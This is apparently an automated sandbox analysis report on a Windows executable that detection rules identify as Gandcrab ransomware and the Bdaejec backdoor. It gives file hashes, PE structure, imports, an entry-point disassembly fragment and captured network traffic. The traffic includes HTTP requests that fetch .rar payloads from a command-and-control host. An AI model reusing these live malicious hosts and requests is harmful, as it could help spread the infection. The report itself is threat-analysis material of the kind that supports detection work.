                                  File name:SY5DeZW6pz.exe
                                  File size:960512
                                  MD5:536f2c1238ef65a64820c35d4504ce67
                                  SHA1:7806d51132e40728f581374a9d72d9713bff2dd0
                                  SHA256:b6a71449958283718f01e6be9f7a9eb057479072c1cc55f26a11b033ea210271
                                  SHA512:3ca2eb2b1603a3b1d903d3af8ce2e789ab4f22a6ab8300161a33396a98696d246f3652e4923b827124ea64d7773a87647d42f8b1acc9b4030370866a4618d2f5
                                  SSDEEP:24576:bh+6kooooooooooooooooooooooooooooooooooooooooooooooooooQ:cCoooooooooooooooooooooooooooooo
                                  TLSH:08153A59F6864312E684177115C13DC1B23E63BB794AEE4894F893491353E8CE3BB8EE
                                  File Content Preview:MZ......................@...............................................!..L.!This W..K..m cannot be run in DOS mode....$.........Tg..:4..:4..:4...4..:4...4..:4...4..:4..:4..:4...4..:4..;42.:4...4..:4...4..:4...4..:4...4..:4Rich..:4........PE..L.9..Z.Z...

                                  File Icon

                                  Icon Hash:00828e8e8686b000

                                  Static PE Info

                                  General

                                  Entrypoint:0x10016000
                                  Entrypoint Section:|Zu8
                                  Digitally signed:false
                                  Imagebase:0x10000000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH
                                  Time Stamp:0x5A8C5AD9 [Tue Feb 20 17:28:57 2018 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:6b11af918234585a966ca8fab046dc6c

                                  Entrypoint Preview

                                  Instruction
                                  push ebp
                                  mov ebp, esp
                                  sub esp, 0000016Ch
                                  xor eax, eax
                                  push ebx
                                  push esi
                                  push edi
                                  mov dword ptr [ebp-24h], eax
                                  mov dword ptr [ebp-10h], eax
                                  mov dword ptr [ebp-14h], eax
                                  mov dword ptr [ebp-08h], eax
                                  mov dword ptr [ebp-0Ch], eax
                                  mov dword ptr [ebp-20h], eax
                                  mov dword ptr [ebp-18h], eax
                                  mov dword ptr [ebp-48h], 73515376h
                                  mov dword ptr [ebp-44h], 652E5868h
                                  mov dword ptr [ebp-40h], 00006578h
                                  mov dword ptr [ebp-3Ch], 00000000h
                                  call 00007F0208BA1085h
                                  pop eax
                                  add eax, 00000225h
                                  mov dword ptr [ebp-04h], eax
                                  mov eax, dword ptr fs:[00000030h]
                                  mov dword ptr [ebp-28h], eax
                                  mov eax, dword ptr [ebp-04h]
                                  mov dword ptr [eax], E904C483h
                                  mov eax, dword ptr [ebp-04h]
                                  mov dword ptr [eax+04h], FFFEE97Fh
                                  mov eax, dword ptr [ebp-28h]
                                  mov eax, dword ptr [eax+0Ch]
                                  mov eax, dword ptr [eax+1Ch]
                                  mov eax, dword ptr [eax]
                                  mov eax, dword ptr [eax+08h]
                                  mov ecx, dword ptr [eax+3Ch]
                                  mov ecx, dword ptr [ecx+eax+78h]
                                  add ecx, eax
                                  mov edi, dword ptr [ecx+1Ch]
                                  mov ebx, dword ptr [ecx+20h]
                                  mov esi, dword ptr [ecx+24h]
                                  mov ecx, dword ptr [ecx+18h]
                                  add esi, eax
                                  add edi, eax
                                  add ebx, eax
                                  xor edx, edx
                                  mov dword ptr [ebp-30h], esi
                                  mov dword ptr [ebp-1Ch], edx
                                  mov dword ptr [ebp-34h], ecx
                                  cmp edx, dword ptr [ebp-34h]
                                  jnc 00007F0208BA11CEh
                                  movzx ecx, word ptr [esi+edx*2]
                                  mov edx, dword ptr [ebx+edx*4]
                                  mov esi, dword ptr [edi+ecx*4]
                                  add edx, eax
                                  mov ecx, dword ptr [edx]
                                  add esi, eax
                                  cmp ecx, 4D746547h
                                  jne 00007F0208BA10D4h
                                  cmp dword ptr [edx+04h], 6C75646Fh
                                  jne 00007F0208BA10CBh

                                  Rich Headers

                                  Programming Language:
                                  • [ C ] VS2013 build 21005
                                  • [IMP] VS2008 SP1 build 30729
                                  • [EXP] VS2013 build 21005
                                  • [RES] VS2013 build 21005
                                  • [LNK] VS2013 build 21005

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x104e00x55.rdata
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x105380xb4.rdata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x140000x1e0.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x150000xac4.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0xa0000x1fc.rdata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000x82e80x8400False0.45945785984848486data6.385498417639289IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rdata0xa0000x70a60x7200False0.4922560307017544data6.246504412470083IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .data0x120000xa800xc00False0.3167317708333333data3.550048547864024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .CRT0x130000x40x200False0.033203125data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .rsrc0x140000x1e00x200False0.53125data4.908362811923507IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0x150000xac40xc00False0.7809244791666666data6.529309093769141IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                  |Zu80x160000x50000x4200False0.7772253787878788data6.934749160260163IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_00x1b0000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_10x200000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_20x250000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_30x2a0000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_40x2f0000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_50x340000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_60x390000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_70x3e0000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_80x430000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_90x480000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_100x4d0000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_110x520000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_120x570000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_130x5c0000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_140x610000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_150x660000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_160x6b0000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_170x700000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_180x750000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_190x7a0000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_200x7f0000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_210x840000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_220x890000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_230x8e0000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_240x930000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_250x980000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_260x9d0000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_270xa20000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_280xa70000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_290xac0000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_300xb10000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_310xb60000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_320xbb0000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_330xc00000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_340xc50000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_350xca0000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_360xcf0000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_370xd40000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_380xd90000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_390xde0000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_400xe30000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_410xe80000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_420xed0000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_430xf20000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_440xf70000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_450xfc0000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_460x1010000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_470x1060000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_480x10b0000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .dat_490x1100000x424a0x4400False0.36379825367647056ISO-8859 text, with very long lines5.347406849062973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                  Resources

                                  NameRVASizeTypeLanguageCountry
                                  RT_MANIFEST0x140600x17dXML 1.0 document textEnglishUnited States

                                  Imports

                                  DLLImport
                                  KERNEL32.dllSetFilePointer, GetFileAttributesW, ReadFile, GetLastError, MoveFileW, lstrcpyW, SetFileAttributesW, CreateMutexW, GetDriveTypeW, VerSetConditionMask, WaitForSingleObject, GetTickCount, InitializeCriticalSection, OpenProcess, GetSystemDirectoryW, TerminateThread, Sleep, TerminateProcess, VerifyVersionInfoW, WaitForMultipleObjects, DeleteCriticalSection, ExpandEnvironmentStringsW, lstrlenW, SetHandleInformation, lstrcatA, MultiByteToWideChar, CreatePipe, lstrcmpiA, Process32NextW, CreateToolhelp32Snapshot, LeaveCriticalSection, EnterCriticalSection, FindFirstFileW, lstrcmpW, FindClose, FindNextFileW, GetNativeSystemInfo, GetComputerNameW, GetDiskFreeSpaceW, GetWindowsDirectoryW, GetVolumeInformationW, LoadLibraryA, lstrcmpiW, VirtualFree, CreateThread, CloseHandle, lstrcatW, CreateFileMappingW, ExitThread, CreateFileW, GetModuleFileNameW, WriteFile, GetModuleHandleW, UnmapViewOfFile, MapViewOfFile, GetFileSize, GetEnvironmentVariableW, lstrcpyA, GetModuleHandleA, VirtualAlloc, GetProcAddress, Process32FirstW, GetTempPathW, GetProcessHeap, HeapFree, HeapAlloc, lstrlenA, CreateProcessW, ExitProcess, IsProcessorFeaturePresent
                                  USER32.dllBeginPaint, wsprintfW, TranslateMessage, LoadCursorW, LoadIconW, MessageBoxA, GetMessageW, EndPaint, DestroyWindow, RegisterClassExW, ShowWindow, CreateWindowExW, SendMessageW, DispatchMessageW, DefWindowProcW, UpdateWindow, GetForegroundWindow, SetWindowLongW
                                  GDI32.dllTextOutW
                                  ADVAPI32.dllFreeSid, RegSetValueExW, RegCreateKeyExW, RegCloseKey, CryptExportKey, CryptAcquireContextW, CryptGetKeyParam, CryptReleaseContext, CryptImportKey, CryptEncrypt, CryptGenKey, CryptDestroyKey, GetUserNameW, RegQueryValueExW, RegOpenKeyExW, AllocateAndInitializeSid
                                  SHELL32.dllShellExecuteW, SHGetSpecialFolderPathW, ShellExecuteExW
                                  CRYPT32.dllCryptStringToBinaryA, CryptBinaryToStringA
                                  WININET.dllInternetCloseHandle, HttpAddRequestHeadersW, HttpSendRequestW, InternetConnectW, HttpOpenRequestW, InternetOpenW, InternetReadFile
                                  PSAPI.DLLEnumDeviceDrivers, GetDeviceDriverBaseNameW

                                  Exports

                                  NameOrdinalAddress
                                  _ReflectiveLoader@010x10005ec0

                                  Possible Origin

                                  Language of compilation systemCountry where language is spokenMap
                                  EnglishUnited States

                                  Network Behavior

                                  Snort IDS Alerts

                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                  192.168.2.463.251.106.25497087992807908 08/31/22-23:41:31.686542TCP2807908ETPRO TROJAN Backdoor.Win32/Bdaejec.A Checkin49708799192.168.2.463.251.106.25
                                  192.168.2.463.251.106.25497077992807908 08/31/22-23:41:23.030290TCP2807908ETPRO TROJAN Backdoor.Win32/Bdaejec.A Checkin49707799192.168.2.463.251.106.25
                                  192.168.2.48.8.8.858565532838522 08/31/22-23:41:22.706087UDP2838522ETPRO TROJAN Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup5856553192.168.2.48.8.8.8

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Aug 31, 2022 23:41:22.853266954 CEST49707799192.168.2.463.251.106.25
                                  Aug 31, 2022 23:41:23.017021894 CEST7994970763.251.106.25192.168.2.4
                                  Aug 31, 2022 23:41:23.017160892 CEST49707799192.168.2.463.251.106.25
                                  Aug 31, 2022 23:41:23.030289888 CEST49707799192.168.2.463.251.106.25
                                  Aug 31, 2022 23:41:23.180901051 CEST7994970763.251.106.25192.168.2.4
                                  Aug 31, 2022 23:41:23.180948019 CEST7994970763.251.106.25192.168.2.4
                                  Aug 31, 2022 23:41:23.181101084 CEST49707799192.168.2.463.251.106.25
                                  Aug 31, 2022 23:41:23.214015007 CEST49707799192.168.2.463.251.106.25
                                  Aug 31, 2022 23:41:23.344805002 CEST7994970763.251.106.25192.168.2.4
                                  Aug 31, 2022 23:41:23.378072023 CEST7994970763.251.106.25192.168.2.4
                                  Aug 31, 2022 23:41:31.519309044 CEST49708799192.168.2.463.251.106.25
                                  Aug 31, 2022 23:41:31.682940006 CEST7994970863.251.106.25192.168.2.4
                                  Aug 31, 2022 23:41:31.683074951 CEST49708799192.168.2.463.251.106.25
                                  Aug 31, 2022 23:41:31.686542034 CEST49708799192.168.2.463.251.106.25
                                  Aug 31, 2022 23:41:31.846843958 CEST7994970863.251.106.25192.168.2.4
                                  Aug 31, 2022 23:41:31.846868038 CEST7994970863.251.106.25192.168.2.4
                                  Aug 31, 2022 23:41:31.846941948 CEST49708799192.168.2.463.251.106.25
                                  Aug 31, 2022 23:41:31.846983910 CEST49708799192.168.2.463.251.106.25
                                  Aug 31, 2022 23:41:31.853856087 CEST49708799192.168.2.463.251.106.25
                                  Aug 31, 2022 23:41:32.010499001 CEST7994970863.251.106.25192.168.2.4
                                  Aug 31, 2022 23:41:32.017546892 CEST7994970863.251.106.25192.168.2.4
                                  Aug 31, 2022 23:41:44.749342918 CEST49715799192.168.2.463.251.106.25
                                  Aug 31, 2022 23:41:44.913203001 CEST7994971563.251.106.25192.168.2.4
                                  Aug 31, 2022 23:41:44.913346052 CEST49715799192.168.2.463.251.106.25
                                  Aug 31, 2022 23:41:45.077069044 CEST7994971563.251.106.25192.168.2.4
                                  Aug 31, 2022 23:41:45.077101946 CEST7994971563.251.106.25192.168.2.4
                                  Aug 31, 2022 23:41:45.077209949 CEST49715799192.168.2.463.251.106.25
                                  Aug 31, 2022 23:41:45.606724977 CEST49715799192.168.2.463.251.106.25

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Aug 31, 2022 23:41:22.706087112 CEST5856553192.168.2.48.8.8.8
                                  Aug 31, 2022 23:41:22.814496994 CEST53585658.8.8.8192.168.2.4

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                  Aug 31, 2022 23:41:22.706087112 CEST192.168.2.48.8.8.80xe22bStandard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                  Aug 31, 2022 23:41:22.814496994 CEST8.8.8.8192.168.2.40xe22bNo error (0)ddos.dnsnb8.net63.251.106.25A (IP address)IN (0x0001)

                                  HTTP Request Dependency Graph

                                  • ddos.dnsnb8.net:799

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.2.44970763.251.106.25799C:\Users\user\AppData\Local\Temp\vSQshX.exe
                                  TimestampkBytes transferredDirectionData
                                  Aug 31, 2022 23:41:23.030289888 CEST613OUTGET /cj//k1.rar HTTP/1.1
                                  Accept: */*
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                  Host: ddos.dnsnb8.net:799
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  1192.168.2.44970863.251.106.25799C:\Users\user\AppData\Local\Temp\vSQshX.exe
                                  TimestampkBytes transferredDirectionData
                                  Aug 31, 2022 23:41:31.686542034 CEST613OUTGET /cj//k2.rar HTTP/1.1
                                  Accept: */*
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                  Host: ddos.dnsnb8.net:799
                                  Connection: Keep-Alive


                                  Statistics

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:23:41:20
                                  Start date:31/08/2022
                                  Path:C:\Users\user\Desktop\SY5DeZW6pz.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\SY5DeZW6pz.exe"
                                  Imagebase:0xf390000
                                  File size:960512 bytes
                                  MD5 hash:536F2C1238EF65A64820C35D4504CE67
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000000.00000000.307805000.000000000F3A2000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000000.00000000.324852504.000000000F3A2000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000000.307798996.000000000F39A000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000002.353018126.000000000F39A000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000000.00000000.317764936.000000000F3A2000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000000.00000002.353129829.000000000F3A2000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000000.324788306.000000000F39A000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000000.317714677.000000000F39A000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, Author: Florian Roth
                                  • Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, Author: ditekSHen
                                  • Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000000.00000002.352730641.0000000003760000.00000008.00000001.00040000.00000003.sdmp, Author: kevoreilly
                                  • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, Author: Florian Roth
                                  • Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, Author: Joe Security
